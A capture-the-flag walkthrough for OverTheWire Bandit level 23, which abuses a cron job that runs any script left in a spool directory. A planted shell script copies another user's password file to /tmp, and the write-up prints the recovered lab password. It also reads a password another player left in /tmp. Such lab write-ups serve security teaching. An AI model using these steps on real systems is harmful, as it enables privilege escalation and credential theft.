OverTheWire: Bandit Level 23

Bandit Level 23 → Level 24

Level Goal: A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

On this level, we are informed that there is a cron script running and we need to enumerate /etc/cron.d/ for the password. So, we traversed to that path. We use ls command to show the list of files inside the directory. As the next level is bandit24 so we read the cronjob_bandit24 using cat command. It shows that there is a script at /usr/bin/cronjob_bandit24.sh. So, we read that script using cat command. We see that we have a script with a variable named myname which consists of the output of the whoami command. The script first changes the name directory to /var/spool and then executes files with the variable myname file. And after executing it deletes all files inside that directory.

➜  ~ ssh bandit23@bandit.labs.overthewire.org -p 2220
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls -l
total 91
-r--r----- 1 root root  46 Nov 14  2014 behemoth4_cleanup
-rw-r--r-- 1 root root 355 May 25  2013 cron-apt
-rw-r--r-- 1 root root  61 Nov 14  2014 cronjob_bandit22
-rw-r--r-- 1 root root  62 Nov 14  2014 cronjob_bandit23
-rw-r--r-- 1 root root  61 May  3  2015 cronjob_bandit24
-r--r----- 1 root root  47 Nov 14  2014 leviathan5_cleanup
-rw------- 1 root root 233 Nov 14  2014 manpage3_resetpw_job
-rw-r--r-- 1 root root  51 Nov 14  2014 melinda-stats
-rw-r--r-- 1 root root  54 Jun 25  2016 natas-session-toucher
-rw-r--r-- 1 root root  49 Jun 25  2016 natas-stats
-r--r----- 1 root root  44 Jun 25  2016 natas25_cleanup
-r--r----- 1 root root  47 Aug  3  2015 natas25_cleanup~
-r--r----- 1 root root  47 Jun 25  2016 natas26_cleanup
-r--r----- 1 root root  43 Jun 25  2016 natas27_cleanup
-rw-r--r-- 1 root root 510 Oct 29  2014 php5
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-32
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-64
-rw-r--r-- 1 root root  64 Jul  8  2015 semtex0-ppc
-rw-r--r-- 1 root root  35 Nov 14  2014 semtex5
-rw-r--r-- 1 root root 396 Nov 10  2013 sysstat
-rw-r--r-- 1 root root  29 Nov 14  2014 vortex0
-rw-r--r-- 1 root root  30 Nov 14  2014 vortex20
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
 echo "Handling $i"
 timeout -s 9 60 "./$i"
 rm -f "./$i"
    fi
done
bandit23@bandit:/etc/cron.d$

Now to get the password for the next directory we will have to create a script of our own so that we can put it inside the /var/spool that will cat the password file from the /etc/bandit_pass/bandit24. We will have to save the file with the name of the next user in order to run the file as a cron job successfully.

bandit23@bandit:~$ mkdir /tmp/testdir-pyro/
bandit23@bandit:~$ nano bandit24.sh
bandit23@bandit:~$ cat bandit24.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/testdir-pyro/level24

Now to execute successfully, we will have to give proper read and write permissions to the script we just created and also to the directory we created.

bandit23@bandit:/tmp/testdir-pyro/$ chmod 777 bandit24.sh
bandit23@bandit:/tmp/testdir-pyro/$ cp bandit24.sh /var/spool/bandit24/
bandit23@bandit:/tmp/testdir-pyro/$ chmod 777 /tmp/testdir-pyro/
bandit23@bandit:/tmp/testdir-pyro/$ ls /var/spool/bandit24/
bandit24.sh

Now we wait for the cron job to execute. Have a bit of patience, it will take some time. After that when we list the files inside the directory, we see that a new file is created and upon reading the contents of that file, we find the password that we were looking for in this level.

<----After a couple of minutes---->
bandit23@bandit:/tmp/testdir-pyro/$ ls /var/spool/bandit24/
bandit23@bandit:/tmp/testdir-pyro/$ ls
bandit24.sh  level24
bandit23@bandit:/tmp/testdir-pyro/$ cat level24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@bandit:/tmp/testdir-pyro/$

Notes:

Now, if the above-mentioned method doesn’t work for you. This is another method to grab the password. It is based on the method that we did at an earlier level. In the previous level we wrote the I am user bandit23 now that we have to grab the password for bandit24 we will write I am user bandit24 and convert it to MD5 and use that text as a directory for the password for the next level. We prefer this method because is obviously faster and easier.

bandit23@bandit:/tmp/$ echo I am user bandit24 | md5sum | cut -d ' ' -f 1
bandit23@bandit:/tmp/$ cat /tmp/ee4ee1703b083edac9f8183e4ae70293
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@bandit:/tmp/$

References:

  • https://linuxize.com/post/scheduling-cron-jobs-with-crontab/